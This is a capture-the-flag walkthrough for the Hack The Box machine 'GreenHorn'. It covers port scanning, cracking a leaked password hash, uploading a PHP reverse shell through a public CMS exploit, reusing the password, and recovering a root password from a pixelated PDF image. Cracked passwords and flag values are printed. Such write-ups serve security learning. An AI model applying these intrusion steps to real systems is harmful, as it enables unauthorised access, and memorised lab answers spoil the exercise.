HTB - GreenHorn [Easy]
tcp
> TARGET=10.129.90.212 && nmap -p -sC -sV -Pn -vvv -oN nmap_tcp_all_10.129.90.212.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOp+cK9ugCW282Gw6Rqe+Yz+5fOGcZzYi8cmlGmFdFAjI1347tnkKumDGK1qJnJ1hj68bmzOONz/x1CMeZjnKMw=
| 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZQbCc8u6r2CVboxEesTZTMmZnMuEidK9zNjkD2RGEv
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 63
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=c85ee957e6e5e3fc; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=6EGwaiK6JbowMQm-YL1Er4HkC4s6MTcyMTYwNjcyNzQzNDMyMDUyMQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 00:05:27 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=b22b65954255c9db; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=jFEOATX_tovMFMbuXnNeqeh6Z-o6MTcyMTYwNjczMzYyMzg1NTA4OQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 00:05:33 GMT
|_ Content-Length: 0
foothold
- browse to
http://greenhorn.htb:3000/and sign up an account - check the code at
http://greenhorn.htb:3000/GreenAdmin/GreenHorn/src/branch/main/data/settings/pass.phpfor a password hash - crack it on
https://crackstation.net/to getiloveyou1 - login at
http://greenhorn.htb/login.php - check out exploit:
https://www.exploit-db.com/exploits/51592 - create a
file.phpand zip it tofile.zip - use shell
/usr/share/webshells/php/php-reverse-shell.php
user: junior
- reuse password
iloveyou1
$ su junior
Password: iloveyou1
id
uid=1000(junior) gid=1000(junior) groups=1000(junior)
bash -i
bash: cannot set terminal process group (999): Inappropriate ioctl for device
bash: no job control in this shell
junior@greenhorn:/var/www$ cd
cd
junior@greenhorn:~$ ls
ls
user.txt
Using OpenVAS.pdf
junior@greenhorn:~$ cat user.txt
cat user.txt
7be9d6dfe2f80b8c6bb9c69da3f653b6
root
- download the pdf file
- extract the blurred image from pdf using
https://pdfcandy.com/ - use
https://github.com/spipm/Depix/tree/mainto unpixel the image
python3 Depix/depix.py -p file.png -s Depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-22 13:51:09,749 - Loading pixelated image from file.png
2024-07-22 13:51:09,766 - Loading search image from Depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-22 13:51:10,349 - Finding color rectangles from pixelated space
2024-07-22 13:51:10,350 - Found 252 same color rectangles
2024-07-22 13:51:10,350 - 190 rectangles left after moot filter
2024-07-22 13:51:10,350 - Found 1 different rectangle sizes
2024-07-22 13:51:10,350 - Finding matches in search image
2024-07-22 13:51:10,350 - Scanning 190 blocks with size (5, 5)
2024-07-22 13:51:10,372 - Scanning in searchImage: 0/1674
2024-07-22 13:51:45,747 - Removing blocks with no matches
2024-07-22 13:51:45,747 - Splitting single matches and multiple matches
2024-07-22 13:51:45,751 - [16 straight matches | 174 multiple matches]
2024-07-22 13:51:45,751 - Trying geometrical matches on single-match squares
2024-07-22 13:51:45,964 - [29 straight matches | 161 multiple matches]
2024-07-22 13:51:45,964 - Trying another pass on geometrical matches
2024-07-22 13:51:46,154 - [41 straight matches | 149 multiple matches]
2024-07-22 13:51:46,154 - Writing single match results to output
2024-07-22 13:51:46,154 - Writing average results for multiple matches to output
2024-07-22 13:51:48,221 - Saving output image to: output.png
junior@greenhorn:~$ su
su
Password: sidefromsidetheothersidesidefromsidetheotherside
root@greenhorn:/home/junior# cd
cd
root@greenhorn:~# cat root.txt
cat root.txt
799c4207af911f6dfcd74e996e6c7d0c
sidefromsidetheothersidesidefromsidetheotherside
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack